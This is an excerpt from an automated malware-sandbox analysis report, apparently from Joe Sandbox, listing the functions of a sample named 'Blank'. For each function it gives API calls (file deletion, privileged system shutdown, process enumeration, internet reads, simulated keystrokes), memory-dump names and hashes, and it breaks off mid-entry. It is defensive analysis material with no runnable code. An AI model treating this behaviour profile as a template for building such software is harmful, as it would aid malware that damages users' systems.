                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2185952417-438819550
                                                                                                                                    • Opcode ID: aeed34f201cb0dd6112dc8191ade06b8dfc345fcbaf0d973ffb63f5ff42a918a
                                                                                                                                    • Instruction ID: f6d860c1bb8b86d1fc1cffae29dbbd7bc9c422a85105927e4ab0b015b9a87315
                                                                                                                                    • Opcode Fuzzy Hash: aeed34f201cb0dd6112dc8191ade06b8dfc345fcbaf0d973ffb63f5ff42a918a
                                                                                                                                    • Instruction Fuzzy Hash: EC419E7192020A9BCF54DF64CD58FEEBBB5EF09350F10816AE818A2191EB309E64CF60
                                                                                                                                    Function 002C4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00272A58,?,00008000), ref: 002802A4
                                                                                                                                      • Part of subcall function 002C4FEC: GetFileAttributesW.KERNEL32(?,002C3BFE), ref: 002C4FED
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002C407C
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 002C40CC
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C40DD
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002C40F4
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002C40FD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                    • Opcode ID: bf1e394eb46066203672b6b80bfc71845efecd62487979902653cdf9cb936aa8
                                                                                                                                    • Instruction ID: 7f96a3d8c0901e578bb0573e8af1396fd33bd62c17abbcca597849ce9f254e4c
                                                                                                                                    • Opcode Fuzzy Hash: bf1e394eb46066203672b6b80bfc71845efecd62487979902653cdf9cb936aa8
                                                                                                                                    • Instruction Fuzzy Hash: 7231C3310683459BC305FF64D895DAFB7A8BE91310F404B2DF8E982192DB319929CB63
                                                                                                                                    Function 002C5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002B93E3
                                                                                                                                      • Part of subcall function 002B9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002B9410
                                                                                                                                      • Part of subcall function 002B9399: GetLastError.KERNEL32 ref: 002B941D
                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 002C57B4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                                    • Opcode ID: c081dce121ecc60cd34a165dfc29dccd08f80f27d8e1c098c80726bfaa19fbae
                                                                                                                                    • Instruction ID: 82a8b7eeb3fdcd6c83646a45dd5c2b6b49f9041339fcd7a227fb76c41c0b8db5
                                                                                                                                    • Opcode Fuzzy Hash: c081dce121ecc60cd34a165dfc29dccd08f80f27d8e1c098c80726bfaa19fbae
                                                                                                                                    • Instruction Fuzzy Hash: 0901D431670723EEE72866649C8AFBAB258AB04790F10062DF913D60D2DA90BCF88564
                                                                                                                                    Function 00275D13 Relevance: 9.2, APIs: 6, Instructions: 223COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00275D40
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,002F0A18,00000000,00000000,?), ref: 00275E07
                                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00275E0E
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00275E5F
                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00275E90
                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00275E9C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 551412401-0
                                                                                                                                    • Opcode ID: db11df23a067be0ae04a6b0715ef0f13d584c2133b7454d12eed5641a6b74c1c
                                                                                                                                    • Instruction ID: 088df2be165ae349fd4ea9bcd743bacd7f9fb9f26edb68ac85f1519fb3babfb5
                                                                                                                                    • Opcode Fuzzy Hash: db11df23a067be0ae04a6b0715ef0f13d584c2133b7454d12eed5641a6b74c1c
                                                                                                                                    • Instruction Fuzzy Hash: 3C910631569BD1DEC731DF7894500ABFFE5AF2A300B98895ED4CF83A02D270A568C759
                                                                                                                                    Function 00261663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00261DD6
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00261E2A
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00261E3D
                                                                                                                                      • Part of subcall function 0026166C: DefDlgProcW.USER32(?,00000020,?), ref: 002616B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3744519093-0
                                                                                                                                    • Opcode ID: 4be6286f54b8e000a664ea602888a4f0046b294afa4a925890c67e0a60d0899f
                                                                                                                                    • Instruction ID: 6cf11ecaede9974f455f2edbc8740a0d424e9ca7ecfcb6ee917cfc8e3d8b6333
                                                                                                                                    • Opcode Fuzzy Hash: 4be6286f54b8e000a664ea602888a4f0046b294afa4a925890c67e0a60d0899f
                                                                                                                                    • Instruction Fuzzy Hash: 30A17874135446BEDB29AF6AAD49E7F259DEF42301F2C010AF402C51D1CB61BDB2C6B6
                                                                                                                                    Function 002CC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002CC329
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CC359
                                                                                                                                    • _wcscmp.LIBCMT ref: 002CC36E
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002CC37F
                                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002CC3AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2387731787-0
                                                                                                                                    • Opcode ID: ddb516b3117f8fadd33eae2a0aeded24339c8c0890e568565bf5fd3fc4608721
                                                                                                                                    • Instruction ID: 974214ed53e44ceee68c19caa6c2f2127c8275b1da9bb33026d03b5dc9966de0
                                                                                                                                    • Opcode Fuzzy Hash: ddb516b3117f8fadd33eae2a0aeded24339c8c0890e568565bf5fd3fc4608721
                                                                                                                                    • Instruction Fuzzy Hash: 58519E756246029FD718DF68D490EAAB3E8EF49320F10865DE95AC73A1DB30ED24CF91
                                                                                                                                    Function 002E59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                    • Opcode ID: df726fe56bb07a00be90ea9d709d895490936cef6254cdd7bf9cd0d677f5fb8d
                                                                                                                                    • Instruction ID: da73aa91e07b110747d53a63234711d76c7cfe21b08f24ccb8878a1a48c9fd54
                                                                                                                                    • Opcode Fuzzy Hash: df726fe56bb07a00be90ea9d709d895490936cef6254cdd7bf9cd0d677f5fb8d
                                                                                                                                    • Instruction Fuzzy Hash: 8111E6713709629BE7111F279C88A6E7B9DFF44774B804139E845D7242CB70A911CAE0
                                                                                                                                    Function 002A0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                                    • Opcode ID: ca7d52874b45269cec1556890f48a84ae969428433bdf40add52e75cc8301600
                                                                                                                                    • Instruction ID: f93dce3d056c9c797e10b92ce744af395b7130721c4e8df4ed3b975d3c3e743f
                                                                                                                                    • Opcode Fuzzy Hash: ca7d52874b45269cec1556890f48a84ae969428433bdf40add52e75cc8301600
                                                                                                                                    • Instruction Fuzzy Hash: B4D01272834108EBC7089A90D8D5DFD777CAB09304F104052F506A2040DAB597A8DB26
                                                                                                                                    Function 002C4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 002C416D
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 002C417B
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 002C419B
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002C4245
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                    • Opcode ID: b7b3f932aa570d05b539e68ef23d88ac0d3459087689244169f3900c1d83cdd2
                                                                                                                                    • Instruction ID: b76e59acbe98fe469e90c073384358043c0717f4dd831416e2f9cb8dc4387c60
                                                                                                                                    • Opcode Fuzzy Hash: b7b3f932aa570d05b539e68ef23d88ac0d3459087689244169f3900c1d83cdd2
                                                                                                                                    • Instruction Fuzzy Hash: A631A2711183419FD310EF54D895FBFBBE8AF95350F40062DF989821A1EB709A69CB53
                                                                                                                                    Function 002D29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002D1ED6,00000000), ref: 002D2AAD
                                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002D2AE4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 599397726-0
                                                                                                                                    • Opcode ID: c77a51538306088a0cff7a3332dbe7d3f2ddf423d622bc1c30a991c3f200ffc8
                                                                                                                                    • Instruction ID: 72364a6342042862811292b14dd2fb518236ec97be192a43bb7a8f33aa0b8587
                                                                                                                                    • Opcode Fuzzy Hash: c77a51538306088a0cff7a3332dbe7d3f2ddf423d622bc1c30a991c3f200ffc8
                                                                                                                                    • Instruction Fuzzy Hash: 3041F87552060AFFEB20DE54CC85FBBB7ACEB50354F10405BF604A6381DAB19D699B60
                                                                                                                                    Function 002B9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280FE6: std::exception::exception.LIBCMT ref: 0028101C
                                                                                                                                      • Part of subcall function 00280FE6: __CxxThrowException@8.LIBCMT ref: 00281031
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002B93E3
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002B9410
                                                                                                                                    • GetLastError.KERNEL32 ref: 002B941D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1922334811-0
                                                                                                                                    • Opcode ID: d14ed2dce9e3b13c23b94dab134db0e1d74bcf7a16c33b36bf4b75d9d9b06763
                                                                                                                                    • Instruction ID: 5d62b5d66526194d274dbf2cf73813adc81f4cab9868543f22fbd0e2efd69cf7
                                                                                                                                    • Opcode Fuzzy Hash: d14ed2dce9e3b13c23b94dab134db0e1d74bcf7a16c33b36bf4b75d9d9b06763
                                                                                                                                    • Instruction Fuzzy Hash: 4C11B2B1428205AFD728EF64ECC5D6BB7FCEB44350B10812EF44996291EB70BC51CB60
                                                                                                                                    Function 002C4254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C4271
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002C42B2
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C42BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                    • Opcode ID: c5e15660b0ad7b028e0d7f2480fe0be0df482a0e942eb7ce5c582d267f85453e
                                                                                                                                    • Instruction ID: 988ddb7f4bae13a6cc92d26c512bbec79de609f8222f20587bbcd8f2f12416d6
                                                                                                                                    • Opcode Fuzzy Hash: c5e15660b0ad7b028e0d7f2480fe0be0df482a0e942eb7ce5c582d267f85453e
                                                                                                                                    • Instruction Fuzzy Hash: CD113075E01228BBDB109F95AC89FBFBBBCEB45B60F104265FD04E7290C6705A019BA1
                                                                                                                                    Function 002C4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002C4F45
                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002C4F5C
                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 002C4F6C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                    • Opcode ID: 0ce28c8649fc045603784f708f974227a4eaa3a81c8ff200d99f7349e0e5caa0
                                                                                                                                    • Instruction ID: 8a6a19ff7f19bee82511ab25beb7988070e85b255aec7c74ecff0ba873bbacb1
                                                                                                                                    • Opcode Fuzzy Hash: 0ce28c8649fc045603784f708f974227a4eaa3a81c8ff200d99f7349e0e5caa0
                                                                                                                                    • Instruction Fuzzy Hash: E8F03775A1120DBFDB00DFE09C89EBEBBB8EB08211F4044A9A901E2681E6346A04CB50
                                                                                                                                    Function 002C1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002C1B01
                                                                                                                                    • keybd_event.USER32(?,000BECBC,?,00000000), ref: 002C1B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                    • Opcode ID: 046bf0e7ef60d43dcb658342f9dfa370b406999caa38b27a572ebdfa997e0eb5
                                                                                                                                    • Instruction ID: 397fb2f3194ba1d4f5a4b533a49dd36a69577b8e76a3e60067b407036ffd3616
